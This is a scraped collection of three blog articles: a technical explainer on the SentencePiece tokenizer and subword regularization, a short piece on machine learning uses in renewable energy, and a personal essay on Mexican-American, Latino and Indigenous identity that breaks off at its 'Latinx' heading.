Surprisingly, it’s not actually a tokenizer, I know, misleading. It’s actually a method for selecting tokens from a precompiled list, optimizing the tokenization process based on a supplied corpus. SentencePiece [1], is the name for a package (available here [2]) which implements the Subword Regularization algorithm [3] (all by the same author, Kudo, Taku). For the duration of the post, I will continue to use SentencePiece to refer to both the algorithm and its package, as that will hopefully be less confusing.
If you want instructions on how to use the actual software, take a look at the colab link at the end of the article or in Reference [18].
Strengths of SentencePiece
It’s implemented in C++ and blazingly fast. You can train a tokenizer on a corpus of 10⁵ characters in seconds. It’s also blazingly fast to tokenize. This means you can use it directly on raw text data, without the need to store your tokenized data to disk. Subword regularization is like a text version of data augmentation, and can greatly improve the quality of your model. It’s whitespace agnostic. You can train non-whitespace delineated languages like Chinese and Japanese with the same ease as you would English or French. It can work at the byte level, so you **almost** never need to use [UNK] or [OOV] tokens. This is not specific only to SentencePiece. This paper [17]: Byte Pair Encoding is Suboptimal for Language Model Pretraining — https://arxiv.org/pdf/2004.03720.pdf
SentencePiece is powerful, but what exactly is its purpose? Alluding to point (3), it enables us to train the subword regularization task, which we now explain.
The Subword Regularization objective
Our goal in this subsection is to explicitly develop the learning objective for subword regularization. To begin, let’s consider how we might assign probabilities to sequences. In general, we like to think of sequences as containing a direction, meaning there is a forward and backward direction. You speak words in an order. Stocks rise and fall over time. We can thus specify the distribution of a sequence in terms of its conditional distributions at earlier times. Given a sequence of unigrams X = (x_1, … , x_n), from repeated application of Bayes’ rule we rewrite its probability as
Readers familiar with the Naive Bayes method [5] should recognize this formula. In Naive Bayes, we make a conditional independence assumption (a strong assumption) that if X is conditioned on some variable y, i.e. P(X|y), then we can assume that p(x_2|x_1, y) = p(x_2 | y), p(x_3|x_2, x_1, y) = p(x_3|y) and so on. Meaning if we are given information about this other thing y, we can totally forget about all the variables x_{j<i} that x_i depends on.
To prep ourselves for such a simplification, we consider the problem of Nerual Machine Translation (NMT). There, we want to assess the probability P(Y|X) of a target sentence Y given an input sentence X. As both Y and X are sequences, we can write the probability [3]
Here, the lower case variables indicate the actual tokens, and the uppercase the sequence of such tokens. Theta represents our model parameters (the weights of a neural network). As it stands, this formula is not quite correct. In reality, X and Y can be formed by an exponentially large number of possible subword sequences. Think breaking down the word “hello”. We could tokenize in a large number of ways:
Even a simple word like “hello” can exhibit an exponential number of possible tokenizations
So in reality, we should replace X and Y on the left with a specific sequence representation x and y. SentencePiece acknowledges this reality, and uses it to its advantage. We can then write the full segmentation-averaged cost function for our NMT task as
|D| is the number of possible segmentations, and x and y are both drawn from their respective distributions over those segmentations. L is the cost function and P is as before.
This formula is slightly intimidating, but you don’t need to think too hard about it. What we can do in practice, is remove the expectation E[…] and just replace x and y with a single randomized segmentation. That’s it. Everything else we would normally do for training an NMT model is unchanged (this includes a short length penalty and any other model hacks).
The “use one sample” approximation should be familiar to anyone who has worked with Variational Autoencoders [6], where the expectation value over hidden states is similarly approximated by a sample size of one.
Now that we’ve defined the training task, we have to answer the practical question; yeah cool, but how in the world do we build a probability distribution over an exponential number of states?! Like everything else in science, we cheat and approximate like hell until someone tells us we can’t.
Unigram language models
At its heart, SentencePiece is just another plain old a unigram model. What this means is that it’s too hard to consider even a joint distribution P(x_1, x_2) of just two tokens, let alone the n needed to specify P(X). So, we just make the approximation:
subject to the normalization constraint:
where every subword (known as a unigram here) occurs with probability independent of every other subword. Yes, a drastic assumption, but empirically not too harmful.
Unigram language models are quite common, and have been around for a while. A popular method called Byte Pair Encoding (BPE), first introduced in the information literature by Gage [7] and later used in the context of NMT by Sennrich et. al. [8] (a very readable paper btw) is a simple method generating based on encoding the text with the fewest required bits of information. A slight variant of BPE called WordPiece is another popular tokenizer, and we refer the reader to other digestible summary articles like [9] for a better overview.
In principle, SentencePiece can be built on any unigram model. The only things we need to feed it are
The unigram probabilities The training corpus
We then just train the SentencePiece tokenizer on the corpus, and we are free to perform the subword regularized (or not) NMT training. The beauty is we don’t even need to use subword regularization if we don’t want to. We could also just use SentencePiece as a fast tokenizer that let’s us handle raw text on the fly.
Despite making the drastic unigram assumption, how to train the tokenizer is not at all obvious, and one of the reasons for this post. We explain this in detail after the next section.
In order to actually do something concrete though, eventually we have to pick a unigram model. In this post, we will use BPE, as it’s straightforward and simple enough that we can make a homecooked version on the spot.
Byte Pair Encoding
The general idea is to do the following:
Go through your corpus and find all the “bytes” i.e. the irreducible characters from which all others can be built. This is our base. It ensures we can almost always reconstruct any unseen input. Run a sliding window over the entire corpus (the actual code is slightly different) and find the most frequent bigram. Bigrams are formed from consecutive subwords in the current list of seen subwords. So, “hello” would have the counts {“he”: 1, “el”:1, “ll”:1, “lo”: 1}. Choose the most frequent bigram, add it to the list of subwords, then merge all instances of this bigram in the corpus. Repeat until you reach your desired vocabulary size.
By always picking the most frequent bigram (i.e. byte-pair) we in essence minimizing the coding length needed to encode our corpus, hence the whole “minimizing information” thing.
In practice, it’s not efficient to loop over the entire corpus every time we want to find a new byte-pair. Instead, we loop once at the start to find all words (not subwords, actual words) and create vocabulary, which is a dictionary matching words to their word count. We then only need to loop over words in the dictionary each time, and if a word appears 20 times, then any of its subwords will also appear at least 20 times.
BPE is an incremental and deterministic method. We can always tokenize by following the same order of merges. I want to pause and emphasize the importance of this point. If we don’t follow the same order, all hell breaks loose. In BPE we first preprocess words to be space separated, with a special </w> token to indicate a word break. Consider the word
Boat → B o a t </w>
Suppose our corpus talks alot about snakes (boa constrictors), breakfast and sailing, so we might see the words “boa”, “oat”, and “boat”. If we talk more about snakes than breakfast, we might get the tokenization
(For snake enthusiasts) Boat → Boa t </w>
(For breakfast enthusiasts) Boats -> B oat </w>
If we never talk about boats, then the tokenizers will never line up. One will have a Boa where the other has an Oat and they won’t agree.
With that digression out of the way, let’s dive right into the BPE code, since it’s not our main focus, and it’s actually semi-written out in the original paper [8]
The standard BPE format is how we wrote Boat above. Subwords separated by spaces, with an end of word token </w>. We choose the token “_” instead of </w> to align better with SentencePiece.
First, in the `initialize_vocab` method, we initialize the vocabulary by getting all the words and their counts, then initialize the tokens by finding all irreducible characters.
The get_bigrams method is auxiliary method to determine the most frequent bigram. The merge vocab takes care of updating the vocab to use the new bigram, and returns the bigram → bytepair merge, so that we can store the operation in a list.
Finally, the find_merges function does the work of actually finding bigrams, and the fit function just coordinates all of the helper methods.
How to train SentencePiece
Great! Now that we have our byte-pair encoder ready to manufacture subwords on the spot, we can turn to training SentencePiece. We assume that we have a large collection of bigrams, greater than whatever desired vocab size we ultimately want. To train, we want to maximize the log-probability of obtaining a particular tokenization X=(x_1, …, x_n) of the corpus, given the unigram probabilities p(x_1),…,p(x_n). Since only the full un-tokenized sequence X is observed, the actual tokenization (x_1, …, x_n) is unobserved. This is a classic setup for using the EM algorithm [10]
So it should be easy right? Just turn to any old ML textbook and copy/paste the EM result. Well,… no. The problem is that the x_i are all of different sizes!
It turns out that the code implementation of sentence piece uses a Bayesian method of training, whereas the paper description uses a maximum likelihood EM method. If this is confusing, just know generally Bayesian=harder. To see what I’m talking about you either have to really dig into the C++ code, or just look where I tell you in references [11] and [12].
Since this point will come up, we need to show how to solve the basic Bayesian EM problem for Dirichlet processes. As it is a little off the main topic, please see Appendix I for details. For now, we’ll keep moving along.
The SentencePiece training objective is the following. We wish to maximize the log-likelihood
Where the x are the unigram sequences, and S(x) denotes the set of all possible sequences. Again, these are hidden variables, we only see the un-tokenized corpus! To solve this, we incorporate an EM type algorithm. If you’re familiar with EM, you’ll notice the steps are actually backwards, we do an ME-method. Despite the fancy name, it’s actually quite intuitive and straightforward. The steps are:
Initialize the unigram probabilities. Remember P(x) = P(x_1)…P(x_n) so once we have the unigrams, we have the probability of any sequence. In our code, we just use the BPE frequency counts to get closer to the objective. M-step: compute the most probable unigram sequence given the current probabilities. This defines a single tokenization. Implementing this requires some thought. E-step: given the current tokenization, recompute the unigram probabilities by counting the occurrence of all subwords in the tokenization. The frequentist unigram probability is just the frequency with which that unigram occurs. In practice, it is of no more difficulty to Bayesian-ify this (see the Appendix) and instead compute
Here, c_i is the count of subword (unigram) i in the current tokenization. M is the total number of subwords. Psi is the digamma function. The arrow indicates how we Bayesian-ify.
4. Repeat steps 2 and 3 until convergence. The log-likelihood is theoretically guaranteed to monotonically increase, so if it doesn’t you’ve got a bug.
We’re almost there, the final piece we need is how to compute step 2.
Finding the optimal tokenization
If all of the subwords were of the same length, this would be a classic application of the Viterbi algorithm [13]. But alas, life is not so simple. The Viterbi algorithm applies to the following problem
You have some hidden states z_1, …, z_n, and you want to transition from z_1 →z_2 →… →z_n, and you know the transition matrix A_ij, giving the probability to go from z_i^{(1)} → z_j^{(2)}, where i and j are the hidden state dimension, and the superscript is the sequence order. All transitions get the same A matrix. You can use Viterbi to construct an optimal path
The issue is that A is not between adjacent states. To understand how this may be a problem, let us represent a simple tokenization procedure diagrammatically.
Consider tokenizing the word “hello”. Let’s say we have the subwords:
{“he”, “h”, “ll”, “e”, “o”, “hell”}.
Then, we can generate the following “trellis-like” figure (it’s not a trellis since we don’t show transitions to all possible hidden states i.e. characters, and transitions are not restricted to nearest neighbors, we can jump more than one box to the right.):
Source: current author. Dashed lines delineate fundamental character/byte spacing. Arrows indicate which words are reachable via allowed tokens. Each column represents a hidden state z_i^{(j)}. i has dimension given by the number of fundamental characters, the superscript indicates sequence order.
Each arrow represents a transition, and we can think of it as carrying a probability as well, given by the unigram probability of the token created from the arrow’s tail (not inclusive) to its head (inclusive). The goal is to now pick arrows such that we arrive at <eos> — end of sequence — with as high a probability as possible.
This problem has optimal substructure and can be solved with dynamic programming. Let’s say we are sitting at state (4). There are three arrows feeding into it, a red, a blue, and a green. The max probability at (4) is just the best path out of the three possible choices: coming from red, from blue, or from green. In equations:
We’re almost ready to code it up, but there’s one issue. How do we actually find those arrows we drew? And how do we do it efficiently? For this, we need to make use of the Trie data structure [14]. It’s bit a bit difficult to explain in words (pun intended!) so let’s just show what the trie looks like for our current problem:
Source: current author. This is the Trie corresponding to the subword dictionary {‘h’, ’he’, ’hell’, ’hello’}. There are additional nodes <sos>-e-<end> and likewise for ‘o’, and ‘l’ as well that we have omitted for clarity.
The root node is the start-of-sequence token <sos>. Any time we encounter and <end> node, it signifies that everything in the path from <sos> to <end> is a valid subword. The root <sos> will begin with exactly one branch for every unique character in our subword list. As we grow the available subwords, we create more branches in our trie. The Trie is going to be the fundamental data structure that our tokenizer uses to store and retrieve subwords.
Here’s a basic Trie implementation in python that will fit all of our needs:
We’ve now got everything we need. The actual algorithm for computing sequences can vary depending on if we want just the best sequence (Viterbi) or the n_best, so we will keep two separate functions for this. The dynamic programming solution to this type of problem is old and so it has other names; it is referred to as a forwards-backwards algorithm, and is a special subset of the sum-product algorithm for training directed graphical models [13, pg. 613]. More sophisticated algorithms include the Forward-DP Backward-A* algorithm [15] and Forward-Filtering and Backward-Sampling algorithm (FFBS) [16]. Our solution will be closer to the latter.
There’s one final note before showing the code. When performing the max over p_{i<j}, we brute force search p_{T<i<j}, where T is the length of the longest subword. That’s probably going to be a small number and shouldn’t harm our O(N) algorithm.
Ok, below is our full sentencepiece trainer. For the moment, you only need to pay attention to the methods 1) forward_step 2) backward_step
The forward and backward steps implement the algorithm we just talked about. The backward step hasn’t been discussed yet though. While we compute the forward step, we also store the length of the max token ending at any given index. This way, we can retrace all of the arrows that led to our max probability, since the length of the arrow fully specifies the transition! This is because the tokenized text isn’t changing, meaning the hidden states are set. We really are just choosing how many steps to jump at every character.
The full EM step is easy to put together now. We follow the steps outlined earlier, and use the Bayesian-ified EM step, which is why we had to import the digamma function from scipy.
There’s one more piece (pun intended again) to make this complete. In general, we want to be able to fix our vocab size. What sentencepiece does is first aggregate more subword tokens than it really needs. We then perform pruning “rounds” whereby we optimize the EM algorithm, then remove or prune off the least probable 20% tokens (probabilities were computed in the E-step). We repeat this procedure until we reach our desired vocab size.
The fit method now takes care of running the EM steps, pruning after each round, then continuing if further reductions are needed. And that’s the trainer.
Subword sampling
The final part is subword sampling. Disclaimer, we don’t use the same algorithm, but it’s enough to generate randomized tokenizations and provide a proof of concept.
In the forward-backward pass, we only stored the optimal sequence. To find alternative tokenizations, at each index instead of saving only the optimal ending subword, we save the n_best number of ending subwords. Now, we can tokenize by randomly sampling each final subword from the provided list. This gives us subword regularization!
Why the disclaimer? Well, if you think about it, we actually still have the same problem as before, where randomly sampling ending subwords locally does not guarantee that the full tokenization will be 2nd, 3rd, 4th, or whatever best. To properly do that, please see the actual sentencepiece implementation [2] or the FFBS algorithm [16].
The random sampler is provided by the generalized_forward_step and generalized_backward_step methods. Here’s an example output
Sample 1: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'or', 'l', 'd']
Sample 2: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'o', 'r', 'l', 'd'] Sample 3: ['h', 'e', 'l', 'l', 'o', '_', 'w', 'or', 'l', 'd']
Conclusion
This was a long dive into SentencePiece, but I hope it has been worth the effort. Now that you know more about how it works, you can promptly forget everything and just piece together what you need from the bullet points at the top of the article (pun still intended!!):
Speed speed speed. Can directly handle text data during training. Subword regularization → better models, data augmentation, improved Language Modeling pretraining Can easily tokenize non-whitespace languages like Japanese and Chinese No more [UNK] tokens (well…almost no more [UNK] tokens)
If you have any NLP tasks, please strongly considering using SentencePiece as your tokenizer. For using the actual software, I’ve found the following google colab tutorial to be really useful [18]
Thanks, and happy tokenizing!
Appendix
Here, we discuss how to Bayesian-ify your EM algorithm. You can also read along with Reference [12].
The discussion is based on the mean field theory. We will simply use its main result, i.e. the coupled equations for determining posterior distributions over hidden parameters/states. See Chapter 10 of [13] for further reading.
The goal of variational inference is to determine the posterior distributions of our model’s unobserved parameters and/or states. We begin by writing the model’s log evidence:
Which is a repeat of our earlier definition; nothing new yet. Recall, X is the un-tokenized corpus, S(x) represents all possible sequences, and the boldface lowercase x denotes a particular tokenization. Due to the summation inside the log, this model is intractable. To make headway, we first introduce hidden variables pi, denoting the unigram probabilities. We further condition these probabilities on a Dirichlet prior, creating a Bayesian model. We write:
The probability p(pi|alpha) is a symmetric Dirichlet distribution:
and the probability of any particular sequence is the product of its unigram probabilities
The x_{nk} binary-valued (can only be 0 or 1) and represent whether the nth position in the sequence is given by the kth subword in the vocabulary. We now make the mean field approximation for the posterior distribution
the subscripts are purely labels; they don’t represent dimensions or anything like that, they’re just names. From here, we can make use of the general formulae for computing posteriors:
and similarly for pi
Inserting our definitions for the log model evidence into the expectation values and pulling out all the terms not averaged over, we find the two equations
Now we make the following observation. The top equation is precisely in the form of a Dirichlet distribution, with a modified prior. Furthermore, since the z_nk are binary variables we can perform their expectation as just the count of various unigrams. We define this with the variable
which again is just the unigram count. Now that we know the distribution over pi, we can compute its expectation value using the known result [13, page 687, Eq. B.21 OR go to wikipedia — way faster]
Putting this into the equation for log q_z(z), we find the distribution
This is exactly our categorical distribution over the weights pi! In other words, we immediately recognize that the thing inside the parenthesis are indeed our weights pi. The only thing we need to mention, is that when applying the Bayesian-ified method, we set alpha=0. This has the effect of enhancing high count unigrams and diminishing low counts.
References
[1] Kudo, Taku, and John Richardson. “Sentencepiece: A simple and language independent subword tokenizer and detokenizer for neural text processing.” arXiv preprint arXiv:1808.06226 (2018).
[2] https://github.com/google/sentencepiece/
[3] Kudo, Taku. “Subword regularization: Improving neural network translation models with multiple subword candidates.” arXiv preprint arXiv:1804.10959 (2018).
[4] Steven L Scott. 2002. “Bayesian methods for hidden markov models: Recursive computing in the 21st century.” Journal of the American Statistical Association .
[5] http://cs229.stanford.edu/notes-spring2019/cs229-notes2.pdf
[6] Kingma, Diederik P., and Max Welling. “Auto-encoding variational bayes.” arXiv preprint arXiv:1312.6114 (2013).
[7] Philip Gage. “A new algorithm for data compression.” C Users J. 12(2):23–38 (1994).
[8] Rico Sennrich, Barry Haddow, and Alexandra Birch. “Neural machine translation of rare words with subword units.” In Proc. of ACL (2016).
[9] https://huggingface.co/transformers/tokenizer_summary.html
[10] http://cs229.stanford.edu/notes-spring2019/cs229-notes8.pdf
[11] Specifically, go to Line 271 https://github.com/google/sentencepiece/blob/master/src/unigram_model_trainer.cc
[12] If you looked at [11] you will find the link, page 178 in particular: https://cs.stanford.edu/~pliang/papers/tutorial-acl2007-talk.pdf
[13] Bishop, Christopher M. “Pattern recognition and machine learning.” springer, (2006). Look at page 629
[14] https://en.wikipedia.org/wiki/Trie — Sorry I don’t have a better reference, I’m really not even sure how I know this anymore.
[15] Masaaki Nagata. “A stochastic japanese morphological analyzer using a forward-dp backward-a* nbest search algorithm.” In Proc. of COLING (1994).
[16] Steven L Scott. “Bayesian methods for hidden markov models: Recursive computing in the 21st century.” Journal of the American Statistical Association (2002).
[17] Bostrom, Kaj, and Greg Durrett. “Byte pair encoding is suboptimal for language model pretraining.” arXiv preprint arXiv:2004.03720 (2020).
[18] https://colab.research.google.com/github/google/sentencepiece/blob/master/python/sentencepiece_python_module_example.ipynb
[19] Murphy, Kevin P. Machine learning: a probabilistic perspective. MIT press, (2012). | https://towardsdatascience.com/sentencepiece-tokenizer-demystified-d0a3aac19b15 | ['Jonathan Kernes'] | 2021-02-08 19:42:52.625000+00:00 | ['Tokenization', 'NLP', 'Editors Pick', 'Getting Started', 'Data Augmentation'] |
Why Renewable Energy Needs AI | Renewable energy uptake is growing rapidly, making up almost half of the UK’s energy mix in Q1 2020, with the UK also going two months without coal-fired power this year. Over the past decade renewable energy has increased by 13.7% annually making up 11% of total energy consumption in 2019.
Within the overall mix, wind power grew by 19% last year whilst solar energy grew by 22% - both grew faster than the more established hydropower.
Costs are down, appeal is up
The growth in renewable energy is partially due to rapidly decreasing costs, with the cost of solar power dropping 82% since 2010 and the cost of onshore wind down 39% in that time. Wider usage has also led to cost reductions as the technologies achieve economies of scale.
Costs for renewables are now below coal and gas and are expected to continue to fall. This has made them attractive not only from a purely economic standpoint but equally from the standpoint of investors who are less and less interested in funding new power plants unlikely to be economically viable.
Climate change: driving renewables
The increased uptake of renewables is also partially driven by the growing awareness of the impact of climate change, prompted by events like California’s record fire season with more than 4 million acres burned. The need to mitigate the growth in carbon levels makes renewable energy more attractive and government legislation to prevent further damage to the climate is likely to further drive uptake.
Average global temperature change (1880–2020)
This means that renewables are also increasingly important for the economy. Consider, for example, that the solar industry in the US now employs around 242k people and generates tens of billions of economic value and the wind industry supports 120k jobs.
As the sector continues to make up a larger portion of the economy, a market will emerge seeking solutions to address the industry’s pain points, such as intermittency and the challenge of matching supply and demand. Many of these solutions will rely on machine learning.
The opportunities
Some of the areas I’m interested in are:
Predictive maintenance Energy generation forecasting Site identification
1. Predictive maintenance
Wind turbines move constantly. It’s pretty much the point. Things that move break down and the maintenance requirements of wind turbines are significant. Operations and maintenance is estimated at 20–25% of the total costs over the lifetime of a turbine.
Wind turbines also generate a lot of data, raising the potential to use the data to improve efficiency and drive down maintenance costs. There is a growing market for digital twin software, which builds a digital copy of a physical asset and uses it to predict performance and required maintenance with wind installations likely to be a key market going forward.
I expect increasingly sophisticated machine learning models that understand the future maintenance requirements of an asset and automatically schedule work at the optimum time.
2. Energy generation forecasting
Unlike the power generated from coal or gas, wind and solar power isn’t constant or controllable. This intermittency will be an increasing problem as their share of the total power mix increases.
In 2019, Google used AI to predict wind output 36 hours in advance, allowing the wind farm to commit to providing energy in advance and increasing the price achieved by 20% versus providing energy without committing in advance.
I anticipate AI will enable energy producers to make more accurate predictions of energy generation based on factors such as local weather, asset performance and position, allowing more efficient matching of supply and demand and increasing the value of the power generated.
3. Site selection
The final use case I expect to emerge is in identifying the best sites for renewable energy assets. Both wind turbines and solar panels rely on local conditions for power generation, meaning that a complex array of factors such as weather, land prices, grid connectivity and installation cost need to be considered when deciding where to build.
As the rate of installation increases, I expect energy companies will use to specialised software to decide which sites to build on, optimising for a range of factors to find the best locations. Being able to combine multiple data sources and tailor decisions to specific use cases is likely to be a key competency for players in the space.
Working in this space? Get in touch
The growth of renewable energy offers up exciting opportunities to companies to improve the world whilst also building attractive businesses.
If you’re building something in the renewables space, I’d love to hear from you. | https://medium.com/nanotrends/why-renewable-energy-needs-ai-70ce57038805 | ['Luke Smith'] | 2020-12-07 09:16:38.721000+00:00 | ['Climate Change', 'VC', 'Investment', 'AI'] |
Musings About My Identity | Personal Experiences with Mexican, American, Indigenous, Latinx & Others
Photo by Author. Painting, Teotihuacan, by local artist.
Denverite, Coloradoan, American, Miguel Auzense, Zacatecano, Mexicano
My name is Jesús, but many of my friends and family call me Jesse. My pronouns are él, he, him, and his. I was born in Denver, Colorado, to parents from a small town in Zacatecas named Miguel Auza, which is approximately two hours away from the capital city of Zacatecas, Zacatecas. The name Zacatlan was given to this place by the Mexica (Me-Shi-Ca), also known as the Aztecs, and it means the place where grass, zacatl, is abundant.
From as far back as I can remember, our family spent the summer months in Miguel Auza. When I started high school, I began to spend even more time in Mexico, where I made many meaningful and long-lasting friendships with the local young people and others from across the United States whose parents were also from Miguel Auza. During this time period in my life, the following three things occurred: I learned that my Spanish was not as great as I thought it was when I was in the United States, my Spanish improved significantly, and I authentically experienced Mexican culture firsthand. Regarding the latter, I learned that it is quite different being Mexican-American in the United States and being Mexican-American in Mexico. It felt like in neither country, both of those parts of my identity could be embraced simultaneously.
Amigx
When I was in high school and visiting Miguel Auza, a co-ed group of friends socialized together but generally aligned themselves and congregated mostly by gender. In the plaza or alameda, you would see a group of young men and young women, separately but near each other. In the group of young men, I can affirm that most of the conversations consisted of helping one build up the courage to tell one of the young women that he liked her. However, in the group of mostly young women, there was always one young man who aligned himself with them named Tony. These experiences are from over twenty years ago, but I vividly remember that group of friends, which included Tony, teaching me about equis (X). They did not refer to each other as amigos or amigas but rather as amigx (amigequis). They were able to apply the nongender conforming equis, seemingly with great ease and fluency. Admittedly, it took me a while to get the hang of the rule. I remember incorrectly applying it to my own name, Jess-equis, and my friends laughed then further explained that they apply the equis to masculine and feminine specific words when in their gender-mixed groups or when referring to another gender-mixed group. When referring to themselves as a mixed-gender group, this group of friends might have identified as Miguel Auzenses, Zacatecanx, and Mexicanx. Whereas all of the young women in the group would refer to themselves individually as Miguel Auzenses, Zacatecanas, and Mexicanas, while Tony identified as Miguel Auzense, Zacatecano, and Mexicano.
They realized that referring to themselves as amigas when Tony was a part of their group feminized him in a way that did not honor his identity as a young man. They also realized that referring to themselves as amigos just because Tony was a part of their group, which is the general rule of thumb in Spanish, would masculinize them and subject them to the language's patriarchal norms. As a group of forward-thinking young people, they challenged these gendered structures and created a language that worked better for their needs. At that time, I had not met anyone who referred to themselves, in the singular, with the nongender conforming equis. My experience was limited to mixed-gender groups using equis to replace masculine or femine specific words in Spanish.
Mexican-American y Chicano
Long before I spent so much time in Miguel Auza, my parents always told me that I was México-Americano and that even though I was born in the United States, they wanted me to have dual citizenship. In the United States, however, I was proudly Mexican. When I would travel to Mexico, my friends would tell me that I was Americano. I struggled with identifying as American, even though I was because being American had been racialized for me. American meant white, and I was clearly, not white. To the Mexicanx adults in my life, I was also not Chicano because I spoke Spanish. They had met Mexican-Americans who did not speak Spanish and self-identified as Chicanos and Chicanas, and that was our context. I would later learn that Mexico's Indigenous people called themselves Mexica, and the word Chicano is a shortened form of Mexicano (Me-Shi-Ca-No). During the civil rights movement in the 1960s, leaders like Cesar Chávez, Dolores Huerta, Rodolfo “Corky” Gonzales, and others helped popularize its use with pride for being of Mexican descent while living in the United States. Not quite Mexican, not quite American, but still both.
American
I am a hip hop aficionado and have been that way for as long as I can remember. Hip hop is an important part of the American and English speaking part of my culture. My grandfather babysat me, and while at my grandparents’ home, I spent most of my time rummaging through my uncles’ collection of cassettes. This cassette rummaging is a story of its own. Still, if you have read this far, I want you to know that some of our favorites included: Public Enemy’s It Takes a Nation Of Millions To Hold Us Back, Eric B & Rakim’s Paid in Full, Boogie Down Productions’ Criminal Minded, De La Soul’s 3 Feet High & Rising, The Great Adventures of… Slick Rick, NWA’s Straight Outta Compton, LL Cool J’s Radio, RUN DMC’s Raising Hell, Gang Starr’s Mr. Nice Guy, and Big Daddy Kane’s Long Live the Kane (my dog’s namesake: Big Daddy Cain).
Hispanic
Although the former list of albums is not exhaustive, I mostly wanted to point out that I didn’t have an experience with the word Hispanic until Kid Frost, a self-identified Mexican-American emcee, famously released the song La Raza on his album, Hispanic Causing Panic. Viva La Raza was a rallying cry used by Chicanos to celebrate culture. Hispanic refers to someone who is a descendant of a Spanish speaking country. In that song, Kid Frost said, “It’s in my blood to be an Aztec warrior, go to any extreme and hold no barriers / Chicano, and I’m Brown and proud.” That song was different from the hip hop I was accustomed to, both in what it sounded like as well as in terms of content. Still, I remember being drawn to the use of Spanish in the song and the cultural references he made to being Indigenous and Brown. Before La Raza, I hadn’t heard anyone rap in English and Spanish. However, in any case, Hispanic was still not a term I was hearing anyone refer to themselves or others except when listed as an option on official documents where you were asked to identify your race and/or ethnicity. At that time, I recall that Spanish speaking stations referred to their viewers, including my parents and my family members, at large, as Hispanos.
Latino
About one year after hearing La Raza, Cypress Hill, a hip hop group that included a Cuban-American and Cuban-Mexican-American member, released their self-titled debut album, which included a song called Latin Lingo. The song was not one of my favorites in terms of what it sounded like, but it was the second bilingual example of hip hop I remember being exposed to. At that time, I also hadn’t heard of people who looked like me called Latins or Latinos, as Cypress Hill had referred to themselves. For what it’s worth, generally speaking, Cypress Hill sounded more like the hip hop I was used to than Kid Frost did. In early 1998, the world was introduced to my favorite artist, Christopher Lee Ríos, better known as Big Punisher or Big Pun, a Puerto Rican from the South Bronx, New York City, New York. In his rhymes, Big Pun embraced the term Latin, Latino, and Spanish, as well as Puerto Rican and Boricua, in a way that I hadn’t really heard before. Specifically, he wasn’t making songs about being Latino per se. Still, he let listeners know he was Latino throughout much of his music. His big break came from a hit single called Still Not A Player. The opening verse included several examples of translanguaging and Spanglish, for example: “Puffin’ the lye, from my twinzito / Up in the Benzito, with my Kiko / from Queens, nicknamed Perico.” The song closes with the now-famous outro in Spanish, “boricua, morena.” In Big Pun’s mainstream introduction, he made those cultural connections I had come to be drawn to. He continued to do so throughout the rest of his album, sprinkling Spanish references and Puerto Rican pride here and there like in the song Beware when he says, “Puerto Roc style” or in his song Super Lyrical making a quick reference to the son of God as, “Jesús” (hey-soose) or in Dream Shatterer when he says, “I’m the first Latin rapper to baffle your skull” and “you ain’t promised mañana in the rotten manzana.” Big Pun became my favorite emcee because of his lyrical ability. The Latino affinity was a bonus.
As a hip hop aficionado, the Latino affinity was fundamental, though—representation matters. I was so proud of Big Pun, and I felt like he represented me, even though he was of Puerto Rican descent and I am of Mexican descent. In my eyes, we were the same, and Latinos' shared identity solidified that connection at the time. At this point, I self-identified as Latino, Chicano, and Mexican interchangeably.
As I began to learn more about myself, my ancestors, and the historical experiences of those like me in the United States, I began to feel that Latino also missed the mark on who I am. Italian, French, Portuguese, Spanish, and other languages are each direct descendants of Latin. From Mexico through Central and South America and most of the surrounding islands, Latin America was dubbed this by the French to differentiate it from other parts of colonized America, particularly the north, which was largely colonized by Great Britain. So, Latino (masculine) refers to a man who is a descendant of a country where one of the Latin descendant languages is spoken, which mostly refers to Spanish because it is the official language of most countries in Latin America but, it also includes Portuguese in Brazil and French in Haiti, for example. This is an important distinction from Hispanic, which only refers to descendants of countries where Spanish is spoken.
Indigenous
Some of my ancestors came to this continent as colonizers, mostly from Spain. However, identifying as Latino or Hispanic or Spanish centers whiteness and perpetuates indigenous erasure that I do not wish to partake in or further contribute to. Most of my ancestry is indigenous to this continent and I am very proud of that. Those same colonizing ancestors from Spain planted roots in Mexico and passed their language on from generation to generation. I lament the success of indigenous erasure within my own family tree, which includes gaining a language in Spanish but losing our native language, which was indigenous to this continent, over time, for example. However, being bilingual, in Spanish and English, is an important part of my identity, especially because Spanish is the only language I can communicate with both of my living grandmothers in. It is important to note that there are many things about our indigenous culture which, fortunately, have not been erased, such as the prehispanic culinary culture that we enjoy today like mole, tamales, chilaquiles, sopa de tortilla, and pozole to name just a few. Not to mention the ingredients in our everyday foods that were enjoyed by our ancestors and are indigenous to this continent as well like avocado, chocolate, tomato, maize, and chile. I wrote all of those foods in their anglicized form but each of them is rooted in Nahuatl (the language of the Mexica). Similar to W.E.B. Du Bois’ double consciousness, I grapple with a triple consciousness, at least.
Mestizo
In addition to Mexico-Americano, my mother always told me that I was mestizo, which means mixed. I never quite understood what she meant because both of my parents are Mexican, and my skin tone is brown like the very color of the land on this continent. But when I was in high school, at the recommendation of my cousin Iván, I read Gary Jenning’s Aztec Blood through which I learned about the Spanish caste system in Mexico which included: Peninsulares, Creoles, Mestizos, Pardos, Indios, Mulattos, Zambos, and enslaved Africanos. Later, as an undergraduate, I had the opportunity to study abroad in Zacatecas and took a history class with a man named Don Arturo, who taught me more about Mexico’s history, including the mestizaje. This experience made it make more sense to me, bringing me closer to my native roots.
As a survivor of colonization, indigenous erasure, the mestizaje, and not to mention being a first-generation United States citizen, I am multiracial, multiethnic, multicultural, and multilingual; mixed, if you will. Hence, it is quite challenging for me to check a single box that represents my identity. However, I do have a preference, and in order of fondness, I identify as 1. Latino of Mexican Indigenous descent, 2. Brown, 3. Mexican, 4. Chicano, 5. Latino, 6. American, and 7. Mestizo.
Latinx
